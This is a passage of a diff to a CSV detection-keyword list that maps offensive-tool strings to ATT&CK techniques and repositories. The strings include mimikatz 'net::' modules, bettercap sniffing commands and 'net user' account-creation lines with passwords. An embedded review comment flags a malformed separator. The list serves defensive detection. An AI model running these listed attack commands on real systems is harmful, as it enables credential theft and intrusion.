T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Needle_Sift_BOF","1","1","N/A","10","10","30","7","2021-09-27T22:57:33Z","2021-09-27T20:13:10Z" -"*Needles without the Thread.pptx*","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","0","N/A","10","6","552","55","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" +"*Needles without the Thread.pptx*","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","0","N/A","10","6","553","55","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" "*needlesift.cna*","offensive_tool_keyword","cobaltstrike","Strstr with user-supplied needle and filename as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - 
T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Needle_Sift_BOF","1","1","N/A","10","10","30","7","2021-09-27T22:57:33Z","2021-09-27T20:13:10Z" -"*neo2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*neo2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*neo4jconnection.py*","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","1","N/A","N/A","2","136","12","2023-02-15T11:26:53Z","2020-02-06T17:45:37Z" "*neoneggplant*","offensive_tool_keyword","Github Username","author of RAT tools on github","N/A","N/A","N/A","N/A","POST Exploitation tools","https://github.com/neoneggplant","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*nessus* --set listen_address=127.0.0.1*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability 
scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" 
@@ -13957,7 +14117,7 @@ "*Nessus-*.rpm*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*Nessus-*.tar.gz*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*Nessus-*.txz*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" -"*nessus_vulns_cleaner.rc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*nessus_vulns_cleaner.rc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*nessuscli fetch*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*nessuscli fix*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*nessus-updates*.tar.gz*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" 
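Review bot: The re-added `*nessus_vulns_cleaner.rc*` row still has a malformed separator in `metadata_tool_techniques`: `T1204 -T1210` lacks the space that every other entry in that field uses (` - `). This commit only refreshes the star, fork and updated_at columns, so the defect is carried over unchanged. Any consumer that splits the field on ` - ` (none is visible here, so this is an assumption) would read `T1204 -T1210` as a single unknown token and lose both technique mappings for the detection. I would change the tail of the field to `T1204 - T1210 - T1218`, and if the CSV is produced by a script, fix it in that script's input so the next metadata refresh does not reintroduce it.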
@@ -13968,39 +14128,40 @@ "*net localgroup administrators icebreaker*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*net start SysUpdate*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*net user /add icebreaker *","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" -"*net user HackMe *","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - 
T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","0","N/A","N/A","10","1026","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" -"*net user john H4x00r123*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" -"*net.fuzz *","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*net.fuzz.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*net.probe on","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*net.probe 
on*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*net.sniff *","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*net.sniff.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*net::alias*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*net::deleg*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*net::group*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*net::if*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*net::serverinfo*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*net::session*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*net::share*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*net::stats*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*net::tod*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*net::trust*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*net::user*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*net::wsession*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*net user HackMe *","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","0","N/A","N/A","10","1027","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" +"*net user john H4x00r123*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*net.fuzz 
*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*net.fuzz.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*net.probe on","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*net.probe on*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*net.sniff *","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - 
BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*net.sniff.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*net::alias*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*net::deleg*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*net::group*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - 